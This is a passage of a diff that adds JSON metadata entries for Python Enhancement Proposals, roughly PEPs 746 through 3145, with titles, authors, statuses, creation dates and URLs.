"https://discuss.python.org/t/pep-746-typedmetadata-for-type-checking-of-pep-593-annotated/53834", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "20-May-2024", + "python_version": "3.14", + "post_history": "20-May-2024", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0746/" + }, + "747": { + "number": 747, + "title": "Annotating Type Forms", + "authors": "David Foster, Eric Traut", + "discussions_to": "https://discuss.python.org/t/pep-747-typeexpr-type-hint-for-a-type-expression/55984", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "27-May-2024", + "python_version": "3.14", + "post_history": "`19-Apr-2024 `__, `04-May-2024 `__, `17-Jun-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0747/" + }, + "748": { + "number": 748, + "title": "A Unified TLS API for Python", + "authors": "Joop van de Pol, William Woodruff", + "discussions_to": "https://discuss.python.org/t/pre-pep-discussion-revival-of-pep-543/51263", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "27-Jun-2024", + "python_version": "3.14", + "post_history": "`17-Apr-2024 `__", + "resolution": null, + "requires": null, + "replaces": "543", + "superseded_by": null, + "url": "https://peps.python.org/pep-0748/" + }, + "749": { + "number": 749, + "title": "Implementing PEP 649", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-749-implementing-pep-649/54974", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "28-May-2024", + "python_version": "3.14", + "post_history": "`04-Jun-2024 `__", + "resolution": null, + "requires": "649", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0749/" + }, + "750": { + "number": 750, + "title": "Template Strings", + "authors": "Jim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck", + "discussions_to": "https://discuss.python.org/t/pep-750-tag-strings-for-writing-domain-specific-languages/60408", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "08-Jul-2024", + "python_version": "3.14", + "post_history": "`09-Aug-2024 `__, `17-Oct-2024 `__, `21-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0750/" + }, + "751": { + "number": 751, + "title": "A file format to record Python dependencies for installation reproducibility", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Jul-2024", + "python_version": null, + "post_history": "`25-Jul-2024 `__ `30-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": "665", + "superseded_by": null, + "url": "https://peps.python.org/pep-0751/" + }, + "752": { + "number": 752, + "title": "Implicit namespaces for package repositories", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/63192", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "13-Aug-2024", + "python_version": null, + "post_history": "`18-Aug-2024 `__, `07-Sep-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0752/" + }, + "753": { + "number": 753, + "title": "Uniform project URLs in core metadata", + "authors": "William Woodruff, Facundo Tuesca", + "discussions_to": "https://discuss.python.org/t/pep-753-uniform-urls-in-core-metadata/62792", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "29-Aug-2024", + "python_version": null, + "post_history": "`26-Aug-2024 `__, `03-Sep-2024 `__", + "resolution": "`10-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0753/" + }, + "754": { + "number": 754, + "title": "IEEE 754 Floating Point Special Values", + "authors": "Gregory R. Warnes", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Mar-2003", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0754/" + }, + "755": { + "number": 755, + "title": "Implicit namespace policy for PyPI", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/63191", + "status": "Draft", + "type": "Process", + "topic": "packaging", + "created": "05-Sep-2024", + "python_version": null, + "post_history": "`07-Sep-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0755/" + }, + "756": { + "number": 756, + "title": "Add PyUnicode_Export() and PyUnicode_Import() C functions", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/63891", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2024", + "python_version": "3.14", + "post_history": "`14-Sep-2024 `__", + "resolution": "`29-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0756/" + }, + "757": { + "number": 757, + "title": "C API to import-export Python integers", + "authors": "Sergey B Kirpichev, Victor Stinner", + "discussions_to": "https://discuss.python.org/t/63895", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2024", + "python_version": "3.14", + "post_history": "`14-Sep-2024 `__", + "resolution": "`08-Dec-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0757/" + }, + "758": { + "number": 758, + "title": "Allow ``except`` and ``except*`` expressions without parentheses", + "authors": "Pablo Galindo, Brett Cannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "30-Sep-2024", + "python_version": "3.14", + "post_history": "`02-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0758/" + }, + "759": { + "number": 759, + "title": "External Wheel Hosting", + "authors": "Barry Warsaw, Ethan Smith", + "discussions_to": "https://discuss.python.org/t/pep-759-external-wheel-hosting/66458", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "01-Oct-2024", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0759/" + }, + "760": { + "number": 760, + "title": "No More Bare Excepts", + "authors": "Pablo Galindo, Brett Cannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "02-Oct-2024", + "python_version": "3.14", + "post_history": "`09-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0760/" + }, + "761": { + "number": 761, + "title": "Deprecating PGP signatures for CPython artifacts", + "authors": "Seth Michael Larson", + "discussions_to": "https://discuss.python.org/t/pep-761-deprecating-pgp-signatures-for-cpython-artifacts/67180", + "status": "Active", + "type": "Process", + "topic": "", + "created": "08-Oct-2024", + "python_version": "3.14", + "post_history": "`25-Sep-2024 `__, `09-Oct-2024 `__", + "resolution": "`06-Nov-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0761/" + }, + "762": { + "number": 762, + "title": "REPL-acing the default REPL", + "authors": "Pablo Galindo Salgado, \u0141ukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "11-Oct-2024", + "python_version": "3.13", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0762/" + }, + "763": { + "number": 763, + "title": "Limiting deletions on PyPI", + "authors": "William Woodruff, Alexis Challande", + "discussions_to": "https://discuss.python.org/t/69487", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2024", + "python_version": null, + "post_history": "`09-Jul-2022 `__, `01-Oct-2024 `__, `28-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0763/" + }, + "765": { + "number": 765, + "title": "Disallow return/break/continue that exit a finally block", + "authors": "Irit Katriel, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-765-disallow-return-break-continue-that-exit-a-finally-block/71348", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2024", + "python_version": "3.14", + "post_history": "`09-Nov-2024 `__, `16-Nov-2024 `__,", + "resolution": null, + "requires": null, + "replaces": "601", + "superseded_by": null, + "url": "https://peps.python.org/pep-0765/" + }, + "766": { + "number": 766, + "title": "Explicit Priority Choices Among Multiple Indexes", + "authors": "Michael Sarahan", + "discussions_to": "https://discuss.python.org/t/pep-for-handling-multiple-indexes-index-priority/71589", + "status": "Draft", + "type": "Informational", + "topic": "packaging", + "created": "18-Nov-2024", + "python_version": null, + "post_history": "`18-Nov-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0766/" + }, + "767": { + "number": 767, + "title": "Annotating Read-Only Attributes", + "authors": "Eneg", + "discussions_to": "https://discuss.python.org/t/pep-767-annotating-read-only-attributes/73408", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "18-Nov-2024", + "python_version": "3.14", + "post_history": "`09-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0767/" + }, + "768": { + "number": 768, + "title": "Safe external debugger interface for CPython", + "authors": "Pablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic", + "discussions_to": "https://discuss.python.org/t/pep-768-safe-external-debugger-interface-for-cpython/73969", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "25-Nov-2024", + "python_version": "3.14", + "post_history": "`11-Dec-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0768/" + }, + "777": { + "number": 777, + "title": "How to Re-invent the Wheel", + "authors": "Ethan Smith", + "discussions_to": "https://discuss.python.org/t/pep-777-how-to-re-invent-the-wheel/67484", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "09-Oct-2024", + "python_version": null, + "post_history": "`10-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0777/" + }, + "789": { + "number": 789, + "title": "Preventing task-cancellation bugs by limiting yield in async generators", + "authors": "Zac Hatfield-Dodds, Nathaniel J. Smith", + "discussions_to": "https://discuss.python.org/t/preventing-yield-inside-certain-context-managers/1091", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "14-May-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0789/" + }, + "801": { + "number": 801, + "title": "Reserved", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "21-Jun-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0801/" + }, + "2026": { + "number": 2026, + "title": "Calendar versioning for Python", + "authors": "Hugo van Kemenade", + "discussions_to": "https://discuss.python.org/t/pep-2026-calendar-versioning-for-python/55782", + "status": "Draft", + "type": "Process", + "topic": "", + "created": "11-Jun-2024", + "python_version": "3.26", + "post_history": "`14-Jun-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-2026/" + }, + "3000": { + "number": 3000, + "title": "Python 3000", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "05-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3000/" + }, + "3001": { + "number": 3001, + "title": "Procedure for reviewing and improving standard library modules", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "05-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3001/" + }, + "3002": { + "number": 3002, + "title": "Procedure for Backwards-Incompatible Changes", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "27-Mar-2006", + "python_version": null, + "post_history": "27-Mar-2006, 13-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3002/" + }, + "3003": { + "number": 3003, + "title": "Python Language Moratorium", + "authors": "Brett Cannon, Jesse Noller, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "21-Oct-2009", + "python_version": null, + "post_history": "03-Nov-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3003/" + }, + "3099": { + "number": 3099, + "title": "Things that will Not Change in Python 3000", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "04-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3099/" + }, + "3100": { + "number": 3100, + "title": "Miscellaneous Python 3.0 Plans", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "20-Aug-2004", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3100/" + }, + "3101": { + "number": 3101, + "title": "Advanced String Formatting", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Apr-2006", + "python_version": "3.0", + "post_history": "28-Apr-2006, 06-May-2006, 10-Jun-2007, 14-Aug-2007, 14-Sep-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3101/" + }, + "3102": { + "number": 3102, + "title": "Keyword-Only Arguments", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2006", + "python_version": "3.0", + "post_history": "28-Apr-2006, 19-May-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3102/" + }, + "3103": { + "number": 3103, + "title": "A Switch/Case Statement", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Jun-2006", + "python_version": "3.0", + "post_history": "26-Jun-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3103/" + }, + "3104": { + "number": 3104, + "title": "Access to Names in Outer Scopes", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Oct-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3104/" + }, + "3105": { + "number": 3105, + "title": "Make print a function", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Nov-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3105/" + }, + "3106": { + "number": 3106, + "title": "Revamping dict.keys(), .values() and .items()", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Dec-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3106/" + }, + "3107": { + "number": 3107, + "title": "Function Annotations", + "authors": "Collin Winter, Tony Lownds", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Dec-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3107/" + }, + "3108": { + "number": 3108, + "title": "Standard Library Reorganization", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2007", + "python_version": "3.0", + "post_history": "28-Apr-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3108/" + }, + "3109": { + "number": 3109, + "title": "Raising Exceptions in Python 3000", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Jan-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3109/" + }, + "3110": { + "number": 3110, + "title": "Catching Exceptions in Python 3000", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Jan-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3110/" + }, + "3111": { + "number": 3111, + "title": "Simple input built-in in Python 3000", + "authors": "Andre Roberge", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2006", + "python_version": "3.0", + "post_history": "22-Dec-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3111/" + }, + "3112": { + "number": 3112, + "title": "Bytes literals in Python 3000", + "authors": "Jason Orendorff", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Feb-2007", + "python_version": "3.0", + "post_history": "23-Feb-2007", + "resolution": null, + "requires": "358", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3112/" + }, + "3113": { + "number": 3113, + "title": "Removal of Tuple Parameter Unpacking", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Mar-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3113/" + }, + "3114": { + "number": 3114, + "title": "Renaming iterator.next() to iterator.__next__()", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Mar-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3114/" + }, + "3115": { + "number": 3115, + "title": "Metaclasses in Python 3000", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Mar-2007", + "python_version": "3.0", + "post_history": "11-Mar-2007, 14-Mar-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3115/" + }, + "3116": { + "number": 3116, + "title": "New I/O", + "authors": "Daniel Stutzbach, Guido van Rossum, Mike Verdone", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2007", + "python_version": "3.0", + "post_history": "26-Feb-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3116/" + }, + "3117": { + "number": 3117, + "title": "Postfix type declarations", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3117/" + }, + "3118": { + "number": 3118, + "title": "Revising the buffer protocol", + "authors": "Travis Oliphant, Carl Banks", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Aug-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3118/" + }, + "3119": { + "number": 3119, + "title": "Introducing Abstract Base Classes", + "authors": "Guido van Rossum, Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2007", + "python_version": "3.0", + "post_history": "26-Apr-2007, 11-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3119/" + }, + "3120": { + "number": 3120, + "title": "Using UTF-8 as the default source encoding", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3120/" + }, + "3121": { + "number": 3121, + "title": "Extension Module Initialization and Finalization", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3121/" + }, + "3122": { + "number": 3122, + "title": "Delineation of the main module", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3122/" + }, + "3123": { + "number": 3123, + "title": "Making PyObject_HEAD conform to standard C", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3123/" + }, + "3124": { + "number": 3124, + "title": "Overloading, Generic Functions, Interfaces, and Adaptation", + "authors": "Phillip J. Eby", + "discussions_to": "python-3000@python.org", + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": null, + "post_history": "30-Apr-2007", + "resolution": null, + "requires": "3107, 3115, 3119", + "replaces": "245, 246", + "superseded_by": null, + "url": "https://peps.python.org/pep-3124/" + }, + "3125": { + "number": 3125, + "title": "Remove Backslash Continuation", + "authors": "Jim J. Jewett", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2007", + "python_version": null, + "post_history": "29-Apr-2007, 30-Apr-2007, 04-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3125/" + }, + "3126": { + "number": 3126, + "title": "Remove Implicit String Concatenation", + "authors": "Jim J. Jewett, Raymond Hettinger", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2007", + "python_version": null, + "post_history": "29-Apr-2007, 30-Apr-2007, 07-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3126/" + }, + "3127": { + "number": 3127, + "title": "Integer Literal Support and Syntax", + "authors": "Patrick Maupin", + "discussions_to": "python-3000@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Mar-2007", + "python_version": "3.0", + "post_history": "18-Mar-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3127/" + }, + "3128": { + "number": 3128, + "title": "BList: A Faster List-like Type", + "authors": "Daniel Stutzbach", + "discussions_to": "python-3000@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Apr-2007", + "python_version": "2.6, 3.0", + "post_history": "30-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3128/" + }, + "3129": { + "number": 3129, + "title": "Class Decorators", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": "07-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3129/" + }, + "3130": { + "number": 3130, + "title": "Access to Current Module/Class/Function", + "authors": "Jim J. Jewett", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2007", + "python_version": "3.0", + "post_history": "22-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3130/" + }, + "3131": { + "number": 3131, + "title": "Supporting Non-ASCII Identifiers", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3131/" + }, + "3132": { + "number": 3132, + "title": "Extended Iterable Unpacking", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3132/" + }, + "3133": { + "number": 3133, + "title": "Introducing Roles", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": "13-May-2007", + "resolution": null, + "requires": "3115, 3129", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3133/" + }, + "3134": { + "number": 3134, + "title": "Exception Chaining and Embedded Tracebacks", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-May-2005", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3134/" + }, + "3135": { + "number": 3135, + "title": "New Super", + "authors": "Calvin Spealman, Tim Delaney, Lie Ryan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": "3.0", + "post_history": "`28-Apr-2007 `__, `29-Apr-2007 `__, `29-Apr-2007 `__, `14-May-2007 `__, `12-Mar-2009 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3135/" + }, + "3136": { + "number": 3136, + "title": "Labeled break and continue", + "authors": "Matt Chisholm", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Jun-2007", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3136/" + }, + "3137": { + "number": 3137, + "title": "Immutable Bytes and Mutable Buffer", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Sep-2007", + "python_version": "3.0", + "post_history": "26-Sep-2007, 30-Sep-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3137/" + }, + "3138": { + "number": 3138, + "title": "String representation in Python 3000", + "authors": "Atsuo Ishimoto", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-May-2008", + "python_version": "3.0", + "post_history": "05-May-2008, 05-Jun-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3138/" + }, + "3139": { + "number": 3139, + "title": "Cleaning out sys and the \"interpreter\" module", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Apr-2008", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3139/" + }, + "3140": { + "number": 3140, + "title": "str(container) should call str(item), not repr(item)", + "authors": "Oleg Broytman, Jim J. Jewett", + "discussions_to": "python-3000@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-May-2008", + "python_version": null, + "post_history": "28-May-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3140/" + }, + "3141": { + "number": 3141, + "title": "A Type Hierarchy for Numbers", + "authors": "Jeffrey Yasskin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Apr-2007", + "python_version": "3.0", + "post_history": "25-Apr-2007, 16-May-2007, 02-Aug-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3141/" + }, + "3142": { + "number": 3142, + "title": "Add a \"while\" clause to generator expressions", + "authors": "Gerald Britton", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Jan-2009", + "python_version": "3.0", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126136.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3142/" + }, + "3143": { + "number": 3143, + "title": "Standard daemon process library", + "authors": "Ben Finney", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2009", + "python_version": "3.x", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3143/" + }, + "3144": { + "number": 3144, + "title": "IP Address Manipulation Library for the Python Standard Library", + "authors": "Peter Moody", + "discussions_to": "ipaddr-py-dev@googlegroups.com", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119474.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3144/" + }, + "3145": { + "number": 3145, + "title": "Asynchronous I/O For subprocess.Popen", + "authors": "Eric Pruitt, Charles R. McCreary, 